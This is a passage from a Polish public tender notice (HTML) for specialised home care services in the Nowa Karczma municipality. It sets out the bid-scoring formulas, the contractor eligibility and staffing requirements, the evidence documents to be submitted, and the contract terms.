taki sam wynik w odniesieniu<br/>do ceny oraz pozostałych kryteriów oceny ofert, wybrana zostanie oferta z niższą ceną od pozostałych cen ofertowych. W przypadku<br/>wystąpienia dwóch ofert z tym samą ceną Zamawiający wzywa Wykonawców do złożenia dodatkowych ofert. Wykonawcy, składając oferty dodatkowe nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie koordynatora usług</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych w miejscu zamieszkania, obejmujących<br/>usługi dostosowane do szczególnych potrzeb wynikających z rodzaju schorzenia lub niepełnosprawności, wykonywanych<br/>przez osoby ze specjalistycznym przygotowaniem zawodowym - dla klientów Ośrodka Pomocy Społecznej w Nowej Karczmie na terenie gminy Nowa Karczma w ilości szacunkowej 720 godzin, w okresie od 1 października 2025 roku do 15 grudnia 2027 roku.<br/>2) Usługi, o których mowa w pkt 1 Wykonawca, w zależności od potrzeb Zamawiającego, będzie świadczył w dni robocze,<br/>dni ustawowo wolne od pracy (sobota, niedziela i święta) 7 dni w tygodniu.<br/>3) Liczba godzin 720 podana w pkt 1 jest liczbą szacunkową, wymiar świadczonych usług wynosi szacunkowo 30 godzin w<br/>miesiącu dla średnio 5 osób w okresie od dnia 1 października 2025 roku do 15 grudnia 2027 r. Liczba godzin może ulec<br/>zmianie, ponieważ nie można jej określić dokładnie ze względu na specyfikę zamówienia, którą cechuje zmienność potrzeb<br/>z uwagi na zmieniający się stan zdrowia i sytuację życiową osób wymagających pomocy.<br/>Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia ilości świadczonych godzin specjalistycznych usług<br/>opiekuńczych w zależności od rzeczywistych potrzeb i możliwości finansowych. Wynagrodzenie należne Wykonawcy<br/>zostanie ustalone na podstawie ceny brutto 1 godziny specjalistycznych usług opiekuńczych podanej w ofercie. Zmiany<br/>ilościowe godzin, jak i zmniejszenie wartości umowy nie wymagają aneksu do umowy. W ramach ceny ofertowej<br/>Zamawiający zastrzega sobie prawo nie wykorzystania w całości zamawianych ilości godzin. Wykonawcy przysługuje<br/>wynagrodzenie za ilość faktycznie świadczonych godzin usług i nie będzie zgłaszał roszczeń co do realizacji pozostałej,<br/>niezleconej przez Zamawiającego części.<br/>4) Wykonawca zobowiązany będzie wykonać przedmiot umowy zgodnie z ustawą z dnia 12 marca 2004 roku o pomocy<br/>społecznej (Dz.U. z 2024 r., poz. 1283 ze zm.), Rozporządzeniem Ministra Polityki Społecznej z dnia 22 września 2005 r. w<br/>sprawie specjalistycznych usług opiekuńczych<br/>(Dz.U. z 2024 r., poz. 816), a także zgodnie ze współczesną wiedzą techniczną i obowiązującymi normami europejskimi<br/>zapewniając bezpieczne i higieniczne warunki pracy. Wykonawca musi wykazać odpowiednie przygotowanie i kwalifikacje<br/>do świadczenia specjalistycznych usług opiekuńczych.<br/>5) Szczegółowy opis:<br/>Zamawiający określa, iż do realizacji tego zadania wymaga by usługi świadczone były przez osoby<br/>z kwalifikacjami określonymi w § 3 rozporządzenia Ministra Polityki Społecznej z dnia 22 września<br/>2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. z 2024 poz. 816), tj.:<br/>a) Specjalistyczne usługi są świadczone przez osoby posiadające kwalifikacje do wykonywania zawodu: pracownika<br/>socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej,<br/>opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i<br/>umiejętności pozwalające świadczyć określone specjalistyczne usługi.<br/>b) W uzasadnionych przypadkach specjalistyczne usługi mogą być świadczone przez osoby, które zdobywają lub podnoszą<br/>wymagane kwalifikacje zawodowe określone w ust. 1, posiadają co najmniej roczny staż pracy w jednostkach, o których<br/>mowa w ust. 2, i mają zapewnioną możliwość konsultacji z osobami świadczącymi specjalistyczne usługi, posiadającymi<br/>wymagane kwalifikacje.<br/>c) Osoby świadczące usługi, o których mowa w § 2 pkt 1 lit. a rozporządzenia Ministra Polityki Społecznej z dnia 22<br/>września 2005 r. w sprawie specjalistycznych usług opiekuńczych, muszą posiadać przeszkolenie i doświadczenie w<br/>zakresie:<br/>• umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań;<br/>• kształtowania nawyków celowej aktywności; prowadzenia treningu zachowań społecznych.<br/>Zamawiający określa, iż Wykonawca będzie dysponował niezbędnym personelem do realizacji zadania.<br/>Zakres specjalistycznych usług opiekuńczych - zawiera rozdz. IV ust.2, pkt 6 SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-10-01 do 2027-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">CZĘŚĆ II<br/><br/>Kryterium cena – 60 % (60 pkt)<br/>Kryterium doświadczenie zawodowe koordynatora usług - 40% (40 pkt)<br/>1.	Kryterium cena zostanie ocenione w skali punktowej do 60 pkt. Oferta z najtańszą ceną uzyska 60 pkt, pozostałe oferty proporcjonalnie mniej punktów. Punkty zostaną wyliczone według następującego wzoru:<br/> oferta z najniższą ceną przedstawiona w ofertach<br/> A = ------------------------------------------------------------ x 100 x 60 %<br/> cena oferty ocenianej <br/> <br/> gdzie: A – liczba otrzymanych punktów<br/><br/>2.	Kryterium doświadczenie koordynatora usług zostanie ocenione w skali punktowej do 40 pkt. Liczba punktów zostanie wyliczona na podstawie wykazanych przez Wykonawcę w Załączniku nr 5 do SWZ według następujących zasad:<br/>doświadczenie koordynatora:<br/>•	od rozpoczęcia pracy do 2 lat – 0 pkt<br/>•	powyżej 2 lat do 4 lat – 8 pkt<br/>•	powyżej 4 lat do 6 lat – 16 pkt<br/>•	powyżej 6 lat do 8 lat – 24 pkt<br/>•	powyżej 8 lat do 10 lat – 32 pkt<br/>•	powyżej 10 lat – 40 pkt<br/><br/>Oferta Wykonawcy z największym doświadczeniem uzyska 40 pkt, pozostałe oferty proporcjonalnie mniej punktów. W przypadku, gdy doświadczenie koordynatora będzie krótsze niż 2 lata, oferta Wykonawcy zostanie odrzucona. W przypadku wskazania w Załączniku nr 5 SWZ większej ilości osób przewidzianych przez Wykonawcę do wykonania czynności koordynatora, doświadczenia tych osób nie będą sumowane, a do oceny zostanie przyjęte doświadczenie osoby, która posiada największe doświadczenie. <br/><br/>Punkty zostaną wyliczone według następującego wzoru:<br/><br/> ilość wykazanych lat w badanej ofercie<br/> A = ------------------------------------------------- x 100 x 40 %<br/> maksymalna ilość wykazanych lat <br/> spośród wszystkich ofert <br/> <br/> gdzie: A – liczba otrzymanych punktów<br/><br/>3.	Obliczenia kryteriów cena i doświadczenie koordynatora usług będą dokonywane z dokładności do dwóch miejsc po przecinku.<br/>4.	Zamówienie zostanie udzielone Wykonawcy, który uzyska najwyższą liczbę punktów w wyniku oceny na podstawie kryteriów oceny określonych w Rozdziale XIV niniejszej SWZ. Maksymalna ilość punktów jaką, po uwzględnieniu wagi kryteriów, może osiągnąć oferta wynosi 100 pkt.<br/>5.	W przypadku, gdy nie można będzie dokonać wyboru oferty z uwagi na to, że więcej ofert posiada taki sam wynik w odniesieniu do ceny oraz pozostałych kryteriów oceny ofert, wybrana zostanie oferta z niższą ceną od pozostałych cen ofertowych. W przypadku wystąpienia dwóch ofert z tym samą ceną Zamawiający wzywa Wykonawców do złożenia dodatkowych ofert. Wykonawcy, składając oferty dodatkowe nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie koordynatora usług</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu<br/>o zamówieniu i niniejszej SWZ.<br/>2. O udzielenie zamówienia (zgodnie z art. 112 ustawy Pzp), mogą ubiegać się Wykonawcy, którzy spełniają określone<br/>przez Zamawiającego warunki udziału w postępowaniu, w zakresie:<br/>1) Na podstawie art. 94 ustawy Pzp Zamawiający zastrzega udział w postępowaniu o zamówienie publicznie wyłącznie do<br/>podmiotów spełniających łącznie dwa warunki:<br/>a) Mający status zakładu pracy chronionej, spółdzielnie socjalne oraz inni wykonawcy, których głównym celem lub głównym<br/>celem działalności ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, jest społeczna i<br/>zawodowa integracja osób społecznie marginalizowanych, w szczególności:<br/>􀀀 osób niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz<br/>zatrudnianiu osób niepełnosprawnych (Dz. U. z 2024 r. poz. 44, 858, 1089 i 1165),<br/>􀀀 bezrobotnych w rozumieniu ustawy z dnia 20 marca 2025 r. o rynku pracy i służbach zatrudnienia (Dz. U. z 2020 r., poz.<br/>620),<br/>􀀀 osób poszukujących pracy, niepozostających w zatrudnieniu lub niewykonujących innej pracy zarobkowej, w rozumieniu<br/>ustawy z dnia 20 marca 2025 r. o rynku pracy i służbach zatrudnienia,<br/>􀀀 osób usamodzielnianych, o których mowa w art. 140 ust. 1 i 2 ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny i<br/>systemie pieczy zastępczej (Dz. U. z 2025 r. poz. 49),<br/>􀀀 osób pozbawionych wolności lub zwalnianych z zakładów karnych, o których mowa w ustawie z dnia 6 czerwca 1997 r. –<br/>Kodeks karny wykonawczy (Dz. U. z 2025 r. poz. 911 ze zm.), mających trudności w integracji ze środowiskiem,<br/>􀀀 osób z zaburzeniami psychicznymi w rozumieniu ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego (Dz.<br/>U. z 2024 r. poz. 917),<br/>􀀀 osób bezdomnych w rozumieniu ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2024 r. poz. 1283 ze zm.),<br/>􀀀 osób, które uzyskały w Rzeczypospolitej Polskiej status uchodźcy lub ochronę uzupełniającą, o których mowa w ustawie z<br/>dnia 13 czerwca 2003 r. o udzielaniu cudzoziemcom ochrony na terytorium Rzeczypospolitej Polskiej (Dz. U. z 2025 r. poz.<br/>223 ze zm.),<br/>􀀀 osób do 30. roku życia oraz po ukończeniu 50. roku życia, posiadających status osoby poszukującej pracy, bez<br/>zatrudnienia,<br/>􀀀 osób będących członkami mniejszości znajdującej się w niekorzystnej sytuacji, w szczególności będących członkami<br/>mniejszości narodowych i etnicznych w rozumieniu ustawy z dnia 6 stycznia 2005 r. o mniejszościach narodowych i<br/>etnicznych oraz o języku regionalnym (Dz. U. z 2017 r. poz. 823).<br/>b) Pod warunkiem, że procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w pkt 1–10, jest nie mniejszy niż 30 % osób zatrudnionych u wykonawcy albo w jego jednostce, która będzie realizowała<br/>zamówienie.<br/>2) Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4) Sytuacji ekonomicznej lub finansowej.<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) W przypadku części I postępowania: jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 200 000,00 zł na okres realizacji zamówienia;<br/>b) W przypadku części II: jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na kwotę nie niższą niż 100 000,00 na okres realizacji zamówienia.<br/>5) Zdolności technicznej lub zawodowej, tj. dotyczące posiadania wiedzy i doświadczenia oraz dysponowania osobami<br/>zdolnymi do wykonania zamówienia –<br/>Warunek powyższy zostanie uznany za spełniony, jeśli Wykonawca wykaże, że:<br/>CZĘŚĆ I:<br/>5a) Zamawiający uzna, że warunek dotyczący wiedzy i doświadczenia został spełniony jeżeli Wykonawca wykaże, że w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wykonał (lub wykonuje) należycie:<br/>• 2 usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia (tj. świadczenie usług opiekuńczych<br/>na rzecz jednostek samorządowych zgodnie z przepisami ustawy z dnia 12 marca 2004 r. o pomocy społecznej) lub<br/>specjalistycznych usług opiekuńczych - w liczbie nie mniejszej niż 3.500 godzin łącznie. Jeżeli są w trakcie wykonywania,<br/>muszą być zrealizowane na dzień składania ofert w liczbie nie mniejszej niż 3500 godzin usług opiekuńczych łącznie.<br/>Podana ilość godzin musi wynikać z realizowanych umów.<br/>Sposób potwierdzenia ww. warunku - szczegółowo w rozdz. VII, ust.2 SWZ<br/>b) Zamawiający uzna, ze warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony,<br/>jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą bezpośrednio świadczyły usługi<br/>opiekuńcze tj. minimum 15 osób, z których każda:<br/>• Ukończyła kurs lub szkołę kształcącą opiekunów środowiskowych, asystentów osób niepełnosprawnych,<br/>pielęgniarki/pielęgniarza, opiekunów osób starszych, opiekunów medycznych, opiekunów kwalifikowanych w domu pomocy<br/>społecznej i posiadają świadectwo ukończenia kursu, szkoły lub posiadają dyplomy zawodowe do posługiwania się ww.<br/>tytułami<br/>lub<br/>• Posiadają udokumentowane doświadczenie w realizacji usług opiekuńczych, w tym zawodowe, wolontariackie lub osobiste<br/>wynikające z pełnienia roli opiekuna faktycznego i odbyli minimum 80-godzinne szkolenie z zakresu realizowanej usługi, w<br/>tym udzielania pierwszej pomocy lub pomocy przedmedycznej<br/>oraz<br/>• Posiadają aktualne zaświadczenie lekarskie stwierdzające brak przeciwwskazań do wykonywania pracy jako opiekunka/n<br/>(zaświadczenie oprócz zdolności do pracy na ww. stanowisku powinno posiadać datę badania oraz datę badania<br/>następnego – data ta stanowi termin do którego pracownik może pracować na danym stanowisku pracy. W przypadku<br/>zaświadczenia lekarza POZ bez daty badania następnego przyjmuje się, że zaświadczenie jest ważne jeden rok od daty<br/>wydania zaświadczenia).<br/>Wykaz osób, które zostaną skierowane do realizacji zamówienia – załącznik nr 4 do SWZ (składany na wezwanie – art. 274<br/>Pzp).<br/>c) Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony,<br/>jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą udokumentowane co najmniej dwuletnie doświadczenie w pracy na stanowisku osoby nadzorującej wykonanie usług opiekuńczych lub o podobnym zakresie – koordynatora, którego zakres odpowiedzialności obejmuje planowanie, koordynowanie pracy opiekunów świadczących usługi i ciągły nadzór nad realizacją usług.<br/>Wykaz osób potwierdzający kwalifikacje (koordynator) – załącznik nr 5 do SWZ (składany wraz z ofertą).<br/>d) Osoby świadczące usługi winny posiadać aktualne badania do celów sanitarno-epidemiologicznych zgodnie z art. 6 ust.1<br/>pkt 4 i 5 ustawy o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi.<br/>CZĘŚĆ II:<br/>5a) Zamawiający uzna, że warunek dotyczący wiedzy i doświadczenia został spełniony jeżeli Wykonawca wykaże, że<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wykonał (lub wykonuje) należycie:<br/>• 2 usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia (tj. świadczenie specjalistycznych<br/>usług opiekuńczych na rzecz jednostek samorządowych), w liczbie nie mniejszej niż 1000 godzin usług łącznie. Jeżeli są w trakcie wykonywania, muszą być zrealizowane na dzień składania ofert w liczbie nie mniejszej niż 1000 godzin specjalistycznych usług opiekuńczych.<br/>Sposób potwierdzenia ww. warunku - szczegółowo w rozdz. VII, ust.2 SWZ<br/>5b) Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony,<br/>jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą bezpośrednio świadczyły specjalistyczne usługi opiekuńcze.<br/>• minimum 10 osób posiadających co najmniej dwuletnie doświadczenie w pracy przy realizacji specjalistycznych usług<br/>opiekuńczych lub w podobnym zakresie oraz posiadające kwalifikacje wymagane Rozporządzeniem Ministra Polityki<br/>Społecznej z dnia 22 września 2005 r. (Dz.U. z 2024 poz. 816) w sprawie specjalistycznych usług opiekuńczych.<br/>Wykaz osób, które zostaną skierowane do realizacji zamówienia – załącznik nr 4 do SWZ (składany na wezwanie – art. 274<br/>Pzp).<br/>5c) Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony,<br/>jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą udokumentowane co najmniej dwuletnie doświadczenie w pracy na stanowisku osoby nadzorującej wykonanie specjalistycznych usług opiekuńczych lub w podobnym zakresie – koordynatora.<br/>Wykaz osób potwierdzający kwalifikacje (koordynator) – załącznik nr 5 do SWZ (składany wraz z ofertą).<br/>5d) Osoby świadczące usługi winny posiadać aktualne badania do celów sanitarno-epidemiologicznych zgodnie z art. 6<br/>ust.1 pkt 4 i 5 ustawy o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi.<br/>Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>b)	zaświadczenie lub inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem lub innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>c)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt. 1 2 i 4 ustawy Pzp oraz art. 109 ust. 1 pkt 2 lit. a, b oraz pkt 3 ustawy Pzp sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>e)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2024r. poz. 1616 ze zm. ) z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz usług wykonanych, którego wzór stanowi załącznik nr 3 do SWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenia Wykonawcy: w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>b) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami Załącznik nr 4 SWZ.<br/>c) Dokumentów potwierdzających status Wykonawcy jako zakładu pracy chronionej lub spółdzielni socjalnej lub dokumentów<br/>potwierdzających prowadzenie przez Wykonawcę lub przez jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała<br/>zamówienie, działalności, której głównym celem jest społeczne i zawodowa integracja osób społecznie marginalizowanych<br/>oraz<br/>Dokumentów potwierdzających procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w ust. 1 zatrudnionych przez zakłady pracy chronionej, spółdzielnie socjalne lub Wykonawcę lub jego wyodrębnioną organizacyjnie jednostkę, która będzie realizowała zamówienie.<br/>Dokumentem potwierdzającym wyżej wymienione (w lit. c) wymagania jest oświadczenie Wykonawcy potwierdzające spełnianie warunku na podstawie art. 94 ust. 1 pkt 1-10 Pzp (wzór stanowi załącznik nr 10 do SWZ) aktualne na dzień składania ofert.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub oświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy prowadzą/świadczą<br/>takie usługi, do realizacji których te zdolności są wymagane.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie wg wzoru stanowiącego Załącznik<br/>Nr 3 do SWZ, które usługi wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 6 do SWZ.<br/>2. Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy.<br/>3. Zamawiający przewiduje możliwość dokonania zamian w umowie na zasadach określonych w projekcie umowy oraz na podstawie art. 454 i 455 ustawy Pzp. <h3 class="mb-0">7.5.) 